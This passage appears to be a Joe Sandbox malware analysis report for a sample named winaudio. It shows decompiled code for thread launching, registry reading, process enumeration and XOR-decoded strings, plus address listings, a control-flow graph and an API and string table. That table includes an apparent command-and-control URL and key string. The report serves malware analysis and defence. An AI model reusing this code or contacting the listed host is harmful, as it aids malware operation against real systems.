											_t233 =  >  ? 0 : _t232;
											 *0x3eb4e0 = _t233;
											 *0x3f0830 = _t233 & 0x00000019 | 0x000000e0;
											__eflags = _t298;
											if(_t298 != 0) {
												 *((intOrPtr*)( *_t298))(1);
											}
											 *(_t304 + _t300 * 4 - 0x854) = 0;
											_t300 = _t300 + 1;
										}
										 *((intOrPtr*)(_v2176 + 4))();
										E002D22F0( &_v2176);
										_t199 =  *0x3ebba4; // 0x0
										_t295 = _v2148;
										_t200 = _t199 + 2;
										__eflags = _t200 - 0x1490;
										_t201 =  >  ? 0 : _t200;
										 *0x3ebba4 = _t201;
										 *0x3f0830 = _t201 & 0x00000019 | 0x000000e0; // executed
										_t204 = E002D9070(_t256, _v2140, _v2148, _t298, _t200 - 0x1490); // executed
										__eflags = _t204;
										if(__eflags == 0) {
											goto L65;
										} else {
											_t295 =  &_v2144;
											_v2144 = 0;
											_t205 = E002D9CE0(_t256,  &_v1112,  &_v2144, _t298, __eflags); // executed
											__eflags = _t205;
											if(_t205 == 0) {
												goto L65;
											} else {
												_t206 =  *0x3ebbb4; // 0x0
												_t207 = _t206 + 2;
												__eflags = _t207 - 0x1490;
												_t208 =  >  ? 0 : _t207;
												 *0x3ebbb4 = _t208;
												_t298 = 0;
												__eflags = 0;
												 *0x3f0830 = _t208 & 0x00000019 | 0x000000e0;
												while(1) {
													__eflags = _t298 - _v2144;
													if(__eflags >= 0) {
														break;
													}
													_t217 = E002E057E(_t295, _t300, __eflags, 0x50);
													_t307 = _t307 + 4;
													_v2200 = _t217;
													_t284 = _t217;
													_v8 = 3;
													_t302 = E002DD730(_t217);
													_v8 = 2;
													 *(_t304 + _t298 * 4 - 0x854) = _t302;
													__eflags = _t302;
													if(_t302 == 0) {
														goto L65;
													} else {
														_t219 =  *0x3eba84; // 0x6d82
														_t307 = _t307 - 0x10;
														_t221 = E002DD870(_t256, _t302, _t298,  *(_t304 + _t298 * 4 - 0x454), _t284, _t219 + _t298 * 2); // executed
														__eflags = _t221;
														if(_t221 == 0) {
															goto L65;
														} else {
															_t222 =  *(_t304 + _t298 * 4 - 0x454);
															__eflags = _t222;
															if(_t222 != 0) {
																L00380508(_t222); // executed
																_t307 = _t307 + 4;
																 *(_t304 + _t298 * 4 - 0x454) = 0;
															}
															_t297 =  *0x3f086c; // 0x340
															_t286 =  *0x3f0868; // 0x11a4908, executed
															_t223 = E002CF8B0(_t286, _t297);
															_t287 =  *0x3ebbf8; // 0x8
															_t295 = 0;
															_t288 = _t287 + 2;
															__eflags = _t288 - 0x1490;
															_t289 =  >  ? 0 : _t288;
															 *0x3ebbf8 = _t289;
															 *0x3f0830 = _t289 & 0x00000019 | 0x000000e0;
															__eflags = _t223;
															if(_t223 == 0) {
																goto L65;
															} else {
																_t300 = _t302 + 4;
																__eflags =  *(_t300 + 0xd);
																if( *(_t300 + 0xd) != 0) {
																	goto L65;
																} else {
																	__eflags =  *(_t300 + 4);
																	if( *(_t300 + 4) == 0) {
																		_t104 = _t300 + 8; // 0x4
																		_t227 = CreateThread(0, 0, E002D2270, _t300, 4, _t104); // executed
																		 *(_t300 + 4) = _t227;
																	}
																	 *0x3f0830 = 0x7ff7; // executed
																	_t224 = ResumeThread( *(_t300 + 4)); // executed
																	__eflags = _t224 - 0xffffffff;
																	_t225 = _t224 & 0xffffff00 | _t224 != 0xffffffff;
																	 *(_t300 + 0xc) = _t225;
																	__eflags = _t225;
																	if(_t225 == 0) {
																		goto L65;
																	} else {
																		_t298 = _t298 + 1;
																		continue;
																	}
																}
															}
														}
													}
													goto L69;
												}
												_t295 = _v2184;
												_t211 = E002DA610(_t256, _v2184); // executed
												__eflags = _t211;
												if(_t211 == 0) {
													break;
												} else {
													__eflags = _v2163;
													if(_v2163 != 0) {
														break;
													} else {
														_t212 = _v2172;
														__eflags = _t212;
														if(_t212 == 0) {
															_t212 = CreateThread(0, 0, E002D2270,  &_v2176, 4,  &_v2168); // executed
															_v2172 = _t212;
														}
														 *0x3f0830 = 0x7ff7; // executed
														_t213 = ResumeThread(_t212); // executed
														__eflags = _t213 - 0xffffffff;
														_t214 = _t213 & 0xffffff00 | _t213 != 0xffffffff;
														_v2164 = _t214;
														__eflags = _t214;
														if(_t214 == 0) {
															break;
														} else {
															goto L65;
														}
													}
												}
											}
										}
									}
									L69:
									 *((intOrPtr*)(_v2176 + 4))();
									E002D22F0( &_v2176);
									E003811DF( &_v2176, _t298, _t300, __eflags);
									_t261 = _v2160;
									_v2200 = _t261;
									_v2204 =  *_t261;
									E002D7D80( &_v2160,  &_v2208,  *_t261, _t261);
									L002E05B1(_v2160);
									_v8 = 5;
									__eflags = _v2164;
									_v2176 = 0x3dce9c;
									if(_v2164 != 0) {
										_v2163 = 1;
										E002D2360( &_v2176);
										E002D22F0( &_v2176);
									}
									_t158 =  *0x3eb504; // 0x6556
									_t159 = _t158 + 2;
									__eflags = _t159 - 0x1490;
									_t160 =  >  ? 0 : _t159;
									 *0x3eb504 = _t160;
									 *0x3f0830 = _t160 & 0x00000019 | 0x000000e0;
									_t163 = _v2172;
									__eflags = _t163;
									if(_t163 != 0) {
										CloseHandle(_t163);
									}
									 *[fs:0x0] = _v16;
									_pop(_t301);
									__eflags = _v24 ^ _t304;
									return E002E056D(_v24 ^ _t304, _t295, _t301);
									L74:
								} else {
									 *0x3f0836 = 1;
								}
							} else {
								_t239 = _v2184;
								if(_t239 != _t298) {
									goto L25;
								} else {
									_t295 = _v2140;
									_t276 = _t256;
									_t300 = _t239 - 4;
									if(_t300 < 0) {
										L17:
										if(_t300 == 0xfffffffc) {
											goto L65;
										} else {
											goto L18;
										}
									} else {
										while( *_t276 ==  *_t295) {
											_t276 = _t276 + 4;
											_t295 = _t295 + 4;
											_t300 = _t300 - 4;
											if(_t300 >= 0) {
												continue;
											} else {
												goto L17;
											}
											goto L27;
										}
										L18:
										if( *_t276 !=  *_t295 || _t300 != 0xfffffffd && ( *((intOrPtr*)(_t276 + 1)) !=  *((intOrPtr*)(_t295 + 1)) || _t300 != 0xfffffffe && ( *((intOrPtr*)(_t276 + 2)) !=  *((intOrPtr*)(_t295 + 2)) || _t300 != 0xffffffff &&  *((intOrPtr*)(_t276 + 3)) !=  *((intOrPtr*)(_t295 + 3))))) {
											goto L25;
										} else {
											goto L65;
										}
									}
								}
							}
						}
					}
					break;
				}
				L27:
				 *0x3f0835 = 1;
				if(_t256 != 0) {
					L00380508(_t256);
					_t307 = _t307 + 4;
				}
				_t148 = _v2140;
				if(_v2140 != 0) {
					L00380508(_t148);
					_t307 = _t307 + 4;
				}
				_t257 = 0;
				while(1) {
					_t149 = _t257 & 0x000000ff;
					if(_t149 >= _v2144) {
						goto L69;
					}
					_t298 = _t149 * 4;
					 *0x3f0830 = 0x7ff7;
					_t300 =  *(_t304 + _t298 - 0x854);
					 *((intOrPtr*)( *(_t300 + 4) + 4))();
					_t170 =  *0x3eb4e0; // 0x6556
					_t172 =  >  ? 0 : _t170 + 2;
					 *0x3eb4e0 = _t172;
					 *0x3f0830 = _t172 & 0x00000019 | 0x000000e0;
					_t175 =  *(_t304 + _t298 - 0x454);
					if( *(_t304 + _t298 - 0x454) != 0) {
						L00380508(_t175);
						_t307 = _t307 + 4;
						 *(_t304 + _t298 - 0x454) = 0;
					}
					if(_t300 != 0) {
						 *( *_t300)(1);
					}
					_t257 = _t257 + 1;
				}
				goto L69;
			}


























































































                        0x002dac90
                        0x002dac90
                        0x002dac93
                        0x002dac95
                        0x002daca0
                        0x002daca1
                        0x002daca7
                        0x002dacac
                        0x002dacae
                        0x002dacb1
                        0x002dacb2
                        0x002dacb3
                        0x002dacb4
                        0x002dacb8
                        0x002dacbe
                        0x002dacc6
                        0x002dacd0
                        0x002dacd5
                        0x002dacd7
                        0x002dace9
                        0x002dacf0
                        0x002dacf6
                        0x002dacfc
                        0x002dad01
                        0x002dad0b
                        0x002dad0e
                        0x002dad14
                        0x002dad1a
                        0x002dad20
                        0x002dad23
                        0x002dad2d
                        0x002dad33
                        0x002dad3e
                        0x002dad44
                        0x002dad4b
                        0x002dad4f
                        0x002dad54
                        0x002dad5a
                        0x00000000
                        0x002dad60
                        0x002dad68
                        0x002dad70
                        0x002dad73
                        0x002dad78
                        0x002dad7b
                        0x002dad85
                        0x002dad85
                        0x002dad95
                        0x002dadb1
                        0x002dadb9
                        0x002dadbe
                        0x002dadc8
                        0x002dadcd
                        0x002dadd0
                        0x002dadf9
                        0x002dae01
                        0x002dae03
                        0x002dae0f
                        0x002dae13
                        0x002dae13
                        0x002dae1e
                        0x002dae1e
                        0x002dae24
                        0x002dae29
                        0x002dae38
                        0x002dae3b
                        0x002dae48
                        0x002dae52
                        0x002dae54
                        0x002dae54
                        0x002dae57
                        0x002dae57
                        0x002dae59
                        0x002dae5a
                        0x002dae5e
                        0x002dae63
                        0x002dae75
                        0x002dae84
                        0x002dae89
                        0x002dae8e
                        0x002db2a4
                        0x002db2a4
                        0x002db2a9
                        0x002db2ab
                        0x002db2ad
                        0x00000000
                        0x002db2b3
                        0x002db2b3
                        0x002db2b3
                        0x002db2b9
                        0x00000000
                        0x00000000
                        0x002db2c4
                        0x002db2ca
                        0x002db2cf
                        0x002db2d0
                        0x002db2d2
                        0x00000000
                        0x002db2d4
                        0x00000000
                        0x002db2d4
                        0x00000000
                        0x002db2d2
                        0x00000000
                        0x002db2b3
                        0x00000000
                        0x002dae94
                        0x002dae94
                        0x002dae9a
                        0x002daea6
                        0x002daf18
                        0x002daf1e
                        0x002daf1f
                        0x002daf28
                        0x002dafe6
                        0x002dafec
                        0x002dafee
                        0x002daff1
                        0x002daff6
                        0x002daff6
                        0x002daff9
                        0x002daffa
                        0x002dafff
                        0x002db001
                        0x002db004
                        0x002db006
                        0x00000000
                        0x002db00c
                        0x002db014
                        0x002db019
                        0x002db01c
                        0x002db01c
                        0x002db020
                        0x002db020
                        0x002db026
                        0x00000000
                        0x00000000
                        0x002db028
                        0x002db035
                        0x002db03f
                        0x002db042
                        0x002db049
                        0x002db04c
                        0x002db051
                        0x002db054
                        0x002db061
                        0x002db066
                        0x002db068
                        0x002db070
                        0x002db070
                        0x002db072
                        0x002db07d
                        0x002db07d
                        0x002db08c
                        0x002db095
                        0x002db09a
                        0x002db0a1
                        0x002db0a7
                        0x002db0aa
                        0x002db0af
                        0x002db0b8
                        0x002db0c5
                        0x002db0ca
                        0x002db0cf
                        0x002db0d1
                        0x00000000
                        0x002db0d7
                        0x002db0d7
                        0x002db0dd
                        0x002db0ed
                        0x002db0f2
                        0x002db0f4
                        0x00000000
                        0x002db0fa
                        0x002db0fa
                        0x002db101
                        0x002db104
                        0x002db109
                        0x002db10c
                        0x002db119
                        0x002db119
                        0x002db11b
                        0x002db120
                        0x002db120
                        0x002db126
                        0x00000000
                        0x00000000
                        0x002db12e
                        0x002db133
                        0x002db136
                        0x002db13c
                        0x002db13e
                        0x002db147
                        0x002db149
                        0x002db14d
                        0x002db154
                        0x002db156
                        0x00000000
                        0x002db15c
                        0x002db15c
                        0x002db161
                        0x002db172
                        0x002db177
                        0x002db179
                        0x00000000
                        0x002db17f
                        0x002db17f
                        0x002db186
                        0x002db188
                        0x002db18b
                        0x002db190
                        0x002db193
                        0x002db193
                        0x002db19e
                        0x002db1a4
                        0x002db1aa
                        0x002db1af
                        0x002db1b5
                        0x002db1b7
                        0x002db1ba
                        0x002db1c0
                        0x002db1c3
                        0x002db1d2
                        0x002db1d8
                        0x002db1da
                        0x00000000
                        0x002db1e0
                        0x002db1e0
                        0x002db1e3
                        0x002db1e6
                        0x00000000
                        0x002db1ec
                        0x002db1ec
                        0x002db1ef
                        0x002db1f1
                        0x002db1ff
                        0x002db205
                        0x002db205
                        0x002db20b
                        0x002db215
                        0x002db21b
                        0x002db21e
                        0x002db221
                        0x002db224
                        0x002db226
                        0x00000000
                        0x002db228
                        0x002db228
                        0x00000000
                        0x002db228
                        0x002db226
                        0x002db1e6
                        0x002db1da
                        0x002db179
                        0x00000000
                        0x002db156
                        0x002db22e
                        0x002db236
                        0x002db23b
                        0x002db23d
                        0x00000000
                        0x002db243
                        0x002db243
                        0x002db24a
                        0x00000000
                        0x002db250
                        0x002db250
                        0x002db256
                        0x002db258
                        0x002db273
                        0x002db279
                        0x002db279
                        0x002db280
                        0x002db28a
                        0x002db290
                        0x002db293
                        0x002db296
                        0x002db29c
                        0x002db29e
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x002db29e
                        0x002db24a
                        0x002db23d
                        0x002db0f4
                        0x002db0d1
                        0x002db2d9
                        0x002db2e5
                        0x002db2ee
                        0x002db2f3
                        0x002db2f8
                        0x002db2ff
                        0x002db30e
                        0x002db31b
                        0x002db326
                        0x002db32e
                        0x002db335
                        0x002db33c
                        0x002db346
                        0x002db34e
                        0x002db355
                        0x002db360
                        0x002db360
                        0x002db365
                        0x002db36c
                        0x002db36f
                        0x002db374
                        0x002db377
                        0x002db384
                        0x002db389
                        0x002db38f
                        0x002db391
                        0x002db394
                        0x002db394
                        0x002db39d
                        0x002db3a6
                        0x002db3ab
                        0x002db3b5
                        0x00000000
                        0x002daf2e
                        0x002daf2e
                        0x002daf2e
                        0x002daea8
                        0x002daea8
                        0x002daeb0
                        0x00000000
                        0x002daeb2
                        0x002daeb2
                        0x002daeba
                        0x002daebc
                        0x002daebf
                        0x002daed2
                        0x002daed5
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x002daec1
                        0x002daec1
                        0x002daec7
                        0x002daeca
                        0x002daecd
                        0x002daed0
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x002daed0
                        0x002daedb
                        0x002daedf
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x002daedf
                        0x002daebf
                        0x002daeb0
                        0x002daea6
                        0x002dae8e
                        0x00000000
                        0x002dae63
                        0x002daf35
                        0x002daf35
                        0x002daf3e
                        0x002daf41
                        0x002daf46
                        0x002daf46
                        0x002daf49
                        0x002daf51
                        0x002daf54
                        0x002daf59
                        0x002daf59
                        0x002daf5c
                        0x002daf60
                        0x002daf60
                        0x002daf69
                        0x00000000
                        0x00000000
                        0x002daf6f
                        0x002daf76
                        0x002daf80
                        0x002daf8d
                        0x002daf90
                        0x002daf9f
                        0x002dafa2
                        0x002dafaf
                        0x002dafb4
                        0x002dafbd
                        0x002dafc0
                        0x002dafc5
                        0x002dafc8
                        0x002dafc8
                        0x002dafd5
                        0x002dafdd
                        0x002dafdd
                        0x002dafdf
                        0x002dafdf
                        0x00000000

                        APIs
                          • Part of subcall function 002D8480: new.LIBCMT ref: 002D8482
                        • RegOpenKeyExA.KERNEL32(80000001,Console,00000000,00020019,?,?,?,847B54EE), ref: 002DADB1
                        • RegQueryValueExA.KERNEL32(00000000,WindowTag,00000000,?,?,00000040), ref: 002DADF9
                        • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,847B54EE), ref: 002DAE1E
                        • new.LIBCMT ref: 002DB12E
                        • CreateThread.KERNEL32(00000000,00000000,Function_00022270,-00000004,00000004,00000004), ref: 002DB1FF
                        • ResumeThread.KERNEL32(?,?,?,00006D82), ref: 002DB215
                        • CreateThread.KERNEL32(00000000,00000000,Function_00022270,003DD54C,00000004,?), ref: 002DB273
                        • ResumeThread.KERNEL32(?), ref: 002DB28A
                        • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,847B54EE), ref: 002DB2C4
                        • CloseHandle.KERNEL32(?,?,?,?,847B54EE), ref: 002DB394
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: Thread$CloseCreateResume$HandleOpenQuerySleepValue
                        • String ID: @$@!-$Console$Pp-$WindowTag$http://41ku.cn:10100/plusxyzs$si-2n*8o_5brl-kq
                        • API String ID: 793569434-60897422
                        • Opcode ID: 7a635c979929b85b2989408180ec3a5e097577ebdeea3136dc56d9719f72863f
                        • Instruction ID: fa6fa22bae680c67affe368017504a4e66d670b4c4e780dc8cba5ac50ab1fb11
                        • Opcode Fuzzy Hash: 7a635c979929b85b2989408180ec3a5e097577ebdeea3136dc56d9719f72863f
                        • Instruction Fuzzy Hash: 6E12C4B19102598FDB26DF24DC95BAAB7F8BB04304F0481EAE89997381DB359D84CF91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 002D7200 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 352processCOMMONCrypto
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 728 2d7200-2d7257 call 37e1a0 CreateToolhelp32Snapshot 731 2d7259-2d7297 Process32First 728->731 732 2d72a0-2d72a2 728->732 733 2d7299-2d729a CloseHandle 731->733 734 2d72b0-2d72d4 731->734 735 2d76da-2d76f4 call 2e056d 732->735 733->732 736 2d72da-2d72dc 734->736 737 2d74e5-2d7512 734->737 739 2d72de 736->739 740 2d72f4-2d730f 736->740 741 2d7518-2d7552 call 37e1a0 * 2 OpenProcess 737->741 742 2d76b5-2d76cb Process32Next 737->742 746 2d72e0-2d72ec call 2d0420 739->746 744 2d7310-2d732f 740->744 759 2d7554-2d756f K32GetModuleFileNameExA 741->759 760 2d75b7-2d75bd 741->760 742->734 745 2d76d1-2d76d8 CloseHandle 742->745 748 2d7333-2d7340 744->748 745->735 755 2d72ee 746->755 751 2d7354-2d735e 748->751 752 2d7342-2d7344 748->752 751->748 758 2d7360-2d737f 751->758 752->751 757 2d7346-2d7349 752->757 755->740 761 2d734f 757->761 762 2d76f5 call 2e0994 757->762 763 2d7385-2d738b 758->763 764 2d7381-2d7383 758->764 766 2d7572-2d7577 759->766 768 2d75c0-2d75c5 760->768 761->751 770 2d76fa-2d76ff call 37f981 762->770 769 2d7390-2d7395 763->769 767 2d7399-2d73be call 2d0860 764->767 766->766 771 2d7579-2d757e 766->771 780 2d7416-2d741c 767->780 781 2d73c0-2d73c8 767->781 768->768 772 2d75c7-2d75cc 768->772 769->769 773 2d7397 769->773 776 2d75a6-2d75b1 CloseHandle 771->776 777 2d7580-2d75a3 call 37e1a0 call 2d6370 771->777 772->742 778 2d75d2-2d75ff call 383728 772->778 773->767 776->760 777->776 790 2d7602-2d7607 778->790 787 2d742f-2d7431 780->787 788 2d741e-2d7429 call 2d7cf0 780->788 781->780 785 2d73ca-2d73eb 781->785 791 2d73ed-2d7404 call 2d7cf0 785->791 792 2d740a-2d7412 785->792 795 2d7447-2d7460 787->795 796 2d7433 787->796 788->787 790->790 797 2d7609-2d760e 790->797 791->792 792->795 801 2d7414 792->801 798 2d74a3-2d74df 795->798 799 2d7462-2d746e 795->799 804 2d7439-2d7441 call 2d0540 796->804 797->742 805 2d7614-2d765d 797->805 798->737 798->744 806 2d749a-2d74a0 call 2e05b1 799->806 807 2d7470-2d7473 799->807 801->804 804->795 805->742 810 2d765f 805->810 806->798 807->770 811 2d7479-2d747e 807->811 814 2d7661-2d7669 810->814 811->770 815 2d7484-2d7489 811->815 817 2d766d-2d767f call 383442 814->817 818 2d766b 814->818 815->770 819 2d748f-2d7492 815->819 817->732 823 2d7685-2d76b3 817->823 818->817 819->770 820 2d7498 819->820 820->806 823->742 823->814
                        C-Code - Quality: 74%
                        			E002D7200(void* __ebx, unsigned int __edx, void* __edi, void* __esi) {
				int _v8;
				void* _v12;
				char _v16;
				signed int _v20;
				char _v21;
				short _v23;
				int _v27;
				char _v52;
				char _v312;
				char _v572;
				intOrPtr _v576;
				int _v580;
				signed char _v596;
				long _v1144;
				void* _v1152;
				char* _v1156;
				int _v1160;
				signed int _v1164;
				void* _v1168;
				void* _v1200;
				void* __ebp;
				signed int _t96;
				signed int _t97;
				void* _t101;
				signed int _t104;
				signed int _t106;
				int _t110;
				signed int _t116;
				void* _t117;
				signed int _t118;
				int _t122;
				signed int _t130;
				signed int _t134;
				signed int _t135;
				void* _t136;
				signed int _t137;
				intOrPtr* _t145;
				signed int _t147;
				signed int _t155;
				signed int _t160;
				signed int _t161;
				signed char* _t164;
				intOrPtr _t165;
				signed int _t171;
				signed int _t172;
				void* _t173;
				signed int _t174;
				signed int _t176;
				int _t178;
				signed char _t179;
				signed char* _t180;
				signed int _t187;
				void* _t193;
				intOrPtr* _t202;
				intOrPtr* _t204;
				signed int _t207;
				signed int _t209;
				intOrPtr* _t211;
				char* _t214;
				signed char _t216;
				intOrPtr* _t217;
				signed int _t218;
				signed char* _t219;
				signed int _t226;
				unsigned int _t229;
				void* _t233;
				void* _t235;
				signed int _t241;
				void* _t242;
				void* _t244;
				void* _t245;
				signed int _t246;
				long _t247;
				void* _t248;
				void* _t249;
				signed int _t250;
				signed int _t251;
				signed int _t253;
				void* _t255;
				void* _t257;

				_t229 = __edx;
				_t193 = __ebx;
				_push(0xffffffff);
				_push(0x39c81b);
				_push( *[fs:0x0]);
				_t96 =  *0x3e1008; // 0x847b54ee
				_t97 = _t96 ^ _t253;
				_v20 = _t97;
				_push(__esi);
				_push(__edi);
				_push(_t97);
				 *[fs:0x0] =  &_v16;
				E0037E1A0(__edi,  &_v1152, 0, 0x22c);
				_t257 = _t255 - 0x480 + 0xc;
				_t101 = CreateToolhelp32Snapshot(2, 0); // executed
				_t244 = _t101;
				_v1168 = _t244;
				if(_t244 == 0) {
					L3:
					goto L62;
				} else {
					_t104 =  *0x3ebb30; // 0x25a
					_v1152 = 0x22c;
					_t106 =  >  ? 0 : _t104 + 2;
					 *0x3ebb30 = _t106;
					 *0x3f0830 = _t106 & 0x00000019 | 0x000000e0;
					_t110 = Process32First(_t244,  &_v1152); // executed
					if(_t110 != 0) {
						do {
							_t241 =  *0x3f09b0; // 0x1186868
							_t246 =  *0x3f09ac; // 0x1186820
							_t229 = 0x2aaaaaab * (_t241 - _t246) >> 0x20 >> 2;
							__eflags = (_t229 >> 0x1f) + _t229 - 1;
							if((_t229 >> 0x1f) + _t229 >= 1) {
								L41:
								_t116 =  *0x3ebb48; // 0x704
								_t247 = _v1144;
								_t117 = _t116 + 2;
								__eflags = _t117 - 0x1490;
								_t118 =  >  ? 0 : _t117;
								 *0x3ebb48 = _t118;
								 *0x3f0830 = _t118 & 0x00000019 | 0x000000e0;
								__eflags = _t247 - 0x64;
								if(_t247 < 0x64) {
									goto L60;
								} else {
									E0037E1A0(_t241,  &_v312, 0, 0x104);
									E0037E1A0(_t241,  &_v572, 0, 0x104);
									_t257 = _t257 + 0x18;
									_t249 = OpenProcess(0x42a, 0, _t247);
									__eflags = _t249;
									if(_t249 != 0) {
										 *0x39e1ec(_t249, 0,  &_v312, 0x104); // executed
										_t211 =  &_v312;
										_t233 = _t211 + 1;
										do {
											_t155 =  *_t211;
											_t211 = _t211 + 1;
											__eflags = _t155;
										} while (_t155 != 0);
										__eflags = _t211 - _t233 - 4;
										if(_t211 - _t233 < 4) {
											E0037E1A0(_t241,  &_v312, 0, 0x104);
											E002D6370(_t193, _t249,  &_v312, _t241, _t249);
											_t257 = _t257 + 0xc;
										}
										 *0x3f0830 = 0x7ff7;
										CloseHandle(_t249);
									}
									_t202 =  &_v312;
									_t229 = _t202 + 1;
									do {
										_t130 =  *_t202;
										_t202 = _t202 + 1;
										__eflags = _t130;
									} while (_t130 != 0);
									__eflags = _t202 - _t229 - 4;
									if(_t202 - _t229 < 4) {
										goto L60;
									} else {
										E00383728( &_v312, 0, 0, 0, 0,  &_v572, 0x104, 0, 0);
										_t204 =  &_v572;
										_t257 = _t257 + 0x24;
										_t229 = _t204 + 1;
										do {
											_t134 =  *_t204;
											_t204 = _t204 + 1;
											__eflags = _t134;
										} while (_t134 != 0);
										__eflags = _t204 - _t229 - 1;
										if(_t204 - _t229 <= 1) {
											goto L60;
										} else {
											_t135 =  *0x3ebb3c; // 0x126e
											_t250 =  *0x3f09ac; // 0x1186820
											_t136 = _t135 + 2;
											__eflags = _t136 - 0x1490;
											_v1156 = 0;
											_t137 =  >  ? 0 : _t136;
											_t207 =  *0x3f09b0; // 0x1186868
											 *0x3ebb3c = _t137;
											 *0x3f0830 = _t137 & 0x00000019 | 0x000000e0;
											_t229 = 0x2aaaaaab * (_t207 - _t250) >> 0x20 >> 2;
											__eflags = (_t229 >> 0x1f) + _t229;
											if((_t229 >> 0x1f) + _t229 == 0) {
												goto L60;
											} else {
												_t242 = 0;
												__eflags = 0;
												while(1) {
													__eflags =  *((intOrPtr*)(_t242 + _t250 + 0x14)) - 0x10;
													_t145 = _t242 + _t250;
													if( *((intOrPtr*)(_t242 + _t250 + 0x14)) >= 0x10) {
														_t145 =  *_t145;
													}
													_t147 = E00383442(_t242, _t250,  &_v572, _t145);
													_t257 = _t257 + 8;
													__eflags = _t147;
													if(_t147 == 0) {
														goto L3;
													}
													_t209 =  *0x3f09b0; // 0x1186868
													_t250 =  *0x3f09ac; // 0x1186820
													_t242 = _t242 + 0x18;
													_v1156 =  &(_v1156[1]);
													_t229 = 0x2aaaaaab * (_t209 - _t250) >> 0x20 >> 2;
													__eflags = _v1156 - (_t229 >> 0x1f) + _t229;
													if(_v1156 < (_t229 >> 0x1f) + _t229) {
														continue;
													} else {
														goto L60;
													}
													goto L68;
												}
												goto L3;
											}
										}
									}
								}
							} else {
								__eflags = _t246 - _t241;
								if(_t246 != _t241) {
									do {
										E002D0420(_t193, _t246, _t241);
										_t246 = _t246 + 0x18;
										__eflags = _t246 - _t241;
									} while (_t246 != _t241);
									_t246 =  *0x3f09ac; // 0x1186820
								}
								_t214 = "pB_nEDMlKDMs_";
								 *0x3f09b0 = _t246;
								_v1156 = _t214;
								_v1160 = 0;
								do {
									asm("xorps xmm0, xmm0");
									_v52 = 0;
									asm("movups [ebp-0x2f], xmm0");
									_t160 = 0;
									__eflags = 0;
									_v27 = 0;
									asm("movq [ebp-0x1f], xmm0");
									_v23 = 0;
									_v21 = 0;
									do {
										_t216 = _t214[_t160] ^ 0x0000002a;
										 *(_t253 + _t160 - 0x30) = _t216;
										__eflags = _t216 - 0x2a;
										if(_t216 != 0x2a) {
											goto L15;
										} else {
											__eflags = _t160;
											if(_t160 == 0) {
												goto L15;
											} else {
												__eflags = _t160 - 0x20;
												if(__eflags >= 0) {
													E002E0994();
													L64:
													E0037F981(_t193, _t216, _t241, __eflags);
													asm("int3");
													_push(_t253);
													_push(_t216);
													_v1200 = 0;
													_t171 = OpenProcessToken(GetCurrentProcess(), 0x28,  &_v1200);
													__eflags = _t171;
													if(_t171 != 0) {
														_t172 =  *0x3ebb6c; // 0x0
														_t173 = _t172 + 2;
														__eflags = _t173 - 0x1490;
														_t174 =  >  ? 0 : _t173;
														 *0x3ebb6c = _t174;
														_t176 = _t174 & 0x00000019 | 0x000000e0;
														__eflags = _t176;
														 *0x3f0830 = _t176; // executed
														E002D7140(_v12, _t241); // executed
														_t178 = FindCloseChangeNotification(_v12); // executed
														return _t178;
													}
													return _t171;
												} else {
													 *(_t253 + _t160 - 0x30) = 0;
													goto L15;
												}
											}
										}
										goto L68;
										L15:
										_t214 = _v1156;
										_t160 = _t160 + 1;
										__eflags = _t160 - 0x20;
									} while (_t160 < 0x20);
									__eflags = _v52;
									_v576 = 0xf;
									_v580 = 0;
									_v596 = 0;
									if(_v52 != 0) {
										_t217 =  &_v52;
										_t28 = _t217 + 1; // 0x1
										_t235 = _t28;
										do {
											_t161 =  *_t217;
											_t217 = _t217 + 1;
											__eflags = _t161;
										} while (_t161 != 0);
										_t218 = _t217 - _t235;
										__eflags = _t218;
									} else {
										_t218 = 0;
									}
									_push(_t218);
									_t219 =  &_v596;
									E002D0860(_t193, _t219,  &_v52);
									_v8 = 0;
									_t164 =  &_v596;
									_t251 =  *0x3f09b0; // 0x1186868
									__eflags = _t164 - _t251;
									if(_t164 >= _t251) {
										L27:
										__eflags = _t251 -  *0x3f09b4; // 0x1186868
										if(__eflags == 0) {
											_push(_t219);
											E002D7CF0(_t193, 0x3f09ac);
											_t251 =  *0x3f09b0; // 0x1186868
										}
										__eflags = _t251;
										if(_t251 != 0) {
											_t180 =  &_v596;
											goto L31;
										}
									} else {
										_t241 =  *0x3f09ac; // 0x1186820
										__eflags = _t241 - _t164;
										if(_t241 > _t164) {
											goto L27;
										} else {
											_t226 = _t164 - _t241;
											_t187 = (0x2aaaaaab * _t226 >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * _t226 >> 0x20 >> 2);
											_v1164 = _t187;
											__eflags = _t251 -  *0x3f09b4; // 0x1186868
											if(__eflags == 0) {
												_push(_t226);
												E002D7CF0(_t193, 0x3f09ac);
												_t251 =  *0x3f09b0; // 0x1186868
												_t241 =  *0x3f09ac; // 0x1186820
												_t187 = _v1164;
											}
											_t180 = _t241 + (_t187 + _t187 * 2) * 8;
											__eflags = _t251;
											if(_t251 != 0) {
												L31:
												E002D0540(_t251, _t180);
												_t251 =  *0x3f09b0; // 0x1186868
											}
										}
									}
									_v8 = 0xffffffff;
									_t165 = _v576;
									 *0x3f09b0 = _t251 + 0x18;
